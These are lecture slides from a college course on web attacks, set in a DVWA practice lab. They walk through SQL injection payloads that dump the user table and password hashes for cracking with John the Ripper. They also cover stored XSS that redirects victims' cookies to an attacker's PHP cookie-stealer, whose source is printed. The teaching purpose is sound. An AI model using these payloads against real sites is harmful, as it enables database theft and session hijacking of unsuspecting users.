Web Applications Attacks A: SQL Injection Stored Cross Site Scripting Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics in Data Communications

Contents 1. Hacking Lab Setup 2. SQL Injection Attack 3. Stored Cross Site Scripting Attack References: Engbretson: The basics of Hacking and Penetration Testing Stuttard: Web Applications Hacker’s Handbook ml

Hacking Lab Setup

The Single Machine Penetration Testing Lab (1) Windows 7 Host Vmware Player virtualization application Variety of linux and winxp guest operating systems run on top of vmware – 1. Fedora 14, hosting the DVWA database application Applications with well defined vulnerabilities Designed for studying vulnerabilities and exploits – Damn Vulnerable Web Application

DVWA: Damn Vulnerable Web Application 3 security levels: low, medium, high Code compare option

The Single Machine Penetration Testing Lab (2) 2. Backtrack 5 – An ubuntu based linux, enriched with many attacking utilities Designed for testing attacks Linux on steroids In this lecture Backtrack will usually be the attacker, and the vulnerable web applications will be on Fedora14/DVWA

Backtrack5

The Single Machine Penetration Testing Lab (2) 3. Windows XP SP2 (un patched) – Has severe vulnerabilities Mostly for testing attacks with Metasploit Framework Other guest operating systems – Ubuntu – Ubuntu Usually serve as users, sometimes as victims and sometimes as associates of the attacker

SQL Injection

The dynamics of a web page

1.user supply data (via a form element or URL) 2. Browser sends HTTP Request with the data to Web Server 3. The Web server pass the data to the appropriate application (e.g. PHP script) 4. application sends an SQL Query, based on the supplied data, to the MySQL Database Management System (DBMS)

The dynamics of a web page 5. MySQL DBMS interrogates the database, construct a reply and sends it back to the Application 6. Application constructs an html page, based on the result, passes it to the web server 7. The Web Server sends the html page to browser 8. Browser renders the web page (shows to the user) Note: html page might contains client-side scripts (Javascript); the browser then runs the script, which updates the page, and then displays it

SQL Injection Attack: Basic Idea If User data is not checked, malicious user can insert a payload (SQL program code) to its data The user data will be sent to the MySQL processor that will execute it. Replies from the MySQL processor get back to the PHP Application The reply might: – Reveal information from the database – Change the database – Give control over the OS of the Web server – And more

In this exercise Attacker: Backtrack5 R1 Victim: Fedora 14, DVWA: user search application – Vulnerability: No input check We will Inject code into the MySQL database We will get information about the structure of the database such as table contents, user names and MD5 hashed passwords We will use John The Ripper to crack the passwords

The Search Application window Insert to the form: 1 – User_id, a number Output: For all users that their records in the database have value of (user_id = 1) as TRUE print their first name, last name and their id

Example: Getting the ID =1 user info The SQL Query is: ′′ SELECT first_name, Surname FROM users WHERE user_id = ' 1' ′′ MySQL searches the users table to find a record with (user_id =1) is TRUE; replies withthe other two fields in the table: first_name, Surname

The OR “=‘ test for vulnerability Insert to the form: a’ OR “=‘ The SQL Query is: ′′ SELECT first_name, Surname FROM users WHERE user_id = ' a' OR ''='' ′′ What will be the result?

The OR “ = ‘ test: Result

The OR “=‘ Test: explanation MySQL searches the users table to find a records with (user_id = ' a' OR ''='') is TRUE; sends back the other two fields in the table: first_name, Surname ''='' statement has the value TRUE empty string on both sides of the equal sign. (user_id = 'a' )OR (''='' ) has always the value TRUE The value of a is not relevant all records in data base have the value TRUE for the WHERE clause

Using UNION: Finding Current MySQL Version Insert: a' UNION SELECT null, The query returns two values Empty string for first_name (due to the null) The version number SQL in Surname

Using UNION to insert a 2 nd SQL Query The query is: ′′SELECT first_name, last_name FROM users WHERE user_id = 'a' UNION SELECT 1, UNION returns records of the two SELECT queries one after the other; Number of columns in the second query must match the number in the first query (here 2); otherwise error. – Field titles (First name, surname) are from the 1 st query 1 st SELECT provides no results 2 nd SELECT has first item as (arbitrary) null Second item is the database version

Finding name of Database, & location of database files Insert: ′ UNION SELECT database(), Result: 1 st SELECT provides no results 2 nd SELECT: first_name (Database name): dvwa Surname (Directory of files in the Operating System): /var/lib/mysql/

Getting the database user Insert: a’ AND 1=0 UNION SELECT null, user() # user() returns the name of the remote user that runs the sql process. That determines its privileges In this case it is root

Find all table names Insert: a’ AND 1=0 UNION SELECT table_name, table_schema FROM information_schema.tables; # The information_schema contains the meta-data of the database: table names, column names, privileges tables, etc. Here we want the names of all the tables. For each we want the table_name and the database it belongs to (the table_schema)

List of tables and their ‘databases’ databases: information_schema, dvwa, mysql

Find all tables that start with ‘user’ Insert to the form: a’ AND 1=0 UNION SELECT table_name, table_schema FROM information_schema.tables WHERE table_name like ‘user%’ #

Tables that start with ‘user’ user_privileges (information_schema database) users (dvwa database) user (mysql database)

Find Columns of table ‘dvwa:users’ Insert: a’ AND 1=0 UNION SELECT concat_WS(‘:’, table_schema, table_name), column_name FROM information_schema.columns WHERE table_name = ‘users’ # concat(separator, valu1, value2, …) concatenates string values, With Separator to one string (here because we can get only 2 values)

Column names of table ‘dvwa:users’ user_id, first_name, last_name, user, password, avatar

Find Contents of dvwa:users table Insert to the form: a’ AND 1=0 UNION SELECT concat_WS(‘:’first_name, last_name), concat_WS(‘:’,user, password) FROM users; #

Contents of dvwa:users table The second field is username:password

Collect the user:password values to the file dvwa_passwd.txt

Cracking the passwords using John The Ripper Here we assume that the password are kept as MD5 hash

Stored Cross Site Scripting Attack

Mechanism of Stored Cross Site Scripting Attacks One user (the Hacker) attacks an un-suspecting user that access the same vulnerable webpage The attacker insert a script (instead of a string) that is stored in the server (usually in a database) The script is downloaded to the victim’s browser whenever it access the same application

Stored Cross Site Scripting Attack example Application: Guest book User visits a web page, write a message Messages stored in a backend database Whenever a user (victim) accesses the guestbook, all previous messages downloaded to that user browser Malicious user (the attacker) could insert a javascript message (also called payload) When the payload is downloaded to a victim user’s browser, it executes and does bad things – Connect to a malicious website, steal cookie,,,,

This exercise: Attacking other users Attacker: Backtrack5 R1 Vulnerable Application on Fedora 14/DVWA webserver: stored cross site scripting, (a guest book application) – The vulnerability: user input not checked, or filtered Victims: Other users using the same application We will exploit the vulnerability to attack other users using the same application – Inject code, direct to other websites, steal cookies

User abi access the vulnerable Application (Guestbook) page, writes a message User info: Name, Message

Result Previous initial messages and abi’s message are downloaded to abi’s browser

Now John (attacker) inserts a script Insert (a javascript): Hi all alert(“Alert from John”) This will serve as a test whether the application checks its data

The script is executed on John’s browser The application sends the script to the browser, which executes it The test is successful; The application does not check, filter, sanitize the User input

Inserting a foreign page to the web browser of victim Insert in the message field: iframe embeds inline other document in the webpage; here, the cnn home page

Embedding an inline document This could be any malicious website

Inserting another foreign page Insert in the message field: HI GUYS GO TO THE Secmaniac WEBSITE HOME OF THE SOCIAL ENGINEER TOOLKIT (SET)

The user gets a surprise new frame

Cookie Stealing: Attempt 1: (failed) Victim login to website DVWA, gets a cookie. Attacker sends to the victim, persuade the victim to click on this “interesting (attacker’s) site” Victim clicks, redirected to that attacker’s site The Attacker site’s HTTP responds with a malicious script that commands the browser to send him the cookie generated by another (the DVWA) site. But a browser is allowed to send cookie only if the commanding javascript came from the same site that originally created the cookie (Same Origin Policy) We need to send script from the DVWA application

Cookie Stealing: Attempt 2 Attacker installs a script in DVWA application, downloaded to a victim user. The script has a link. By clicking on it, the victim’s browser sends a GET request to load another page (from the attacker’s website) Since the script came from DVWA application, trusted by the victim’s browser, the cookie (previously received from DVWA application) is automatically sent in this GET packet. The HTTP request is received and processed by a CookieStealer.php script on the attacker’s website.

redirect users to a cookie stealing page Insert the message: a very interesting site CookieStealer.php; The address above is that of the attacker website CookieStealer.php script copies the cookie of whoever accesses the script

The user’s message has a link Other users will see the link ( a very interesting site) They might be tempted to click on it

The link reappear every time a user sends a message Another user accessed the guestbook This new user clicks on the link…

The user was redirected to the malicious site

A direct method for stealing the user’s cookie Insert into the message field: document.location=‘ Stealer.php?cookie=‘+document.cookie; CookieStealer.php gets the value of the cookie parameter that holds the cookie associated with the current webpage; value is stored in the browser’s host in the document.cookie property

The response from the Attacker’s CookieStealer.php Application

A new user (Ubuntu) log in to the DVWA web application

The Ubuntu user clicks on the Stored XSS application (the guestbook application)

The new user is redirected to the Attacker website As soon as the new user accesses the application for the first time, the script is downloaded to his browser, and he is redirected to the malicious (or faked) attacker’s website

Collecting the cookies of the victims On the attacker host (backtrack), at /var/www: – CookieStealer.php application – log.txt file contains the cookies of the victims

A simple cookiestealer.php Cookie Stealer <?php $cookie = $_GET['cookie']; $log = fopen("log.txt","a"); fwrite($log, $cookie "\n"); fclose($log); echo 'You have been hacked. You are now visiting MY WEBSITE I am now copying your DVWA cookie Your attacker Please click here to go back to the DVWA website ' ?>